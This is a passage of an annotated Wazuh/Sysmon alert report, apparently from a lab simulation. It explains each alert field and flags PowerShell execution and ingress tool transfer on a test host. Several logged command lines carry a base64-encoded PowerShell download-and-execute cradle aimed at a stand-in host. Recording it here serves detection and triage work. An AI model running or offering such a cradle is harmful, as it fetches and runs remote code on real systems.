Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:46.0684203Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285470
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:46.062 ProcessGuid: {94294ddc-bdb0-680a-b00b-000000000e00} ProcessId: 4736 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_epfzzdna.g5t.ps1 CreationUtcTime: 2025-04-24 22:39:46.062 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:46.062
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdb0-680a-b00b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4736
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_epfzzdna.g5t.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:46.062
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:51.124+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:51.124+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  94
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534391.1903172
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:48.4763635Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285495
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:47.286 ProcessGuid: {94294ddc-bdb3-680a-b30b-000000000e00} ProcessId: 10488 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdb0-680a-b00b-000000000e00} ParentProcessId: 4736 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:47.286
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdb3-680a-b30b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10488
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\Users\Attcker1\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdb0-680a-b00b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4736
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:51.143+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:51.143+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  98
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534391.1911239
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:48.7171585Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285496
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:48.710 ProcessGuid: {94294ddc-bdb3-680a-b30b-000000000e00} ProcessId: 10488 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pn3p00ne.adg.ps1 CreationUtcTime: 2025-04-24 22:39:48.710 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:48.710
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdb3-680a-b30b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10488
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pn3p00ne.adg.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:48.710
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:52.372+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:52.372+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  95
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534392.1914008
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:50.5947163Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285521
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:49.622 ProcessGuid: {94294ddc-bdb5-680a-b50b-000000000e00} ProcessId: 4872 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdb3-680a-b30b-000000000e00} ParentProcessId: 10488 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:49.622
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdb5-680a-b50b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4872
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\Users\Attcker1\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdb3-680a-b30b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10488
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:53.382+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:53.382+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  99
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534393.1922075
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:50.7752700Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285522
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

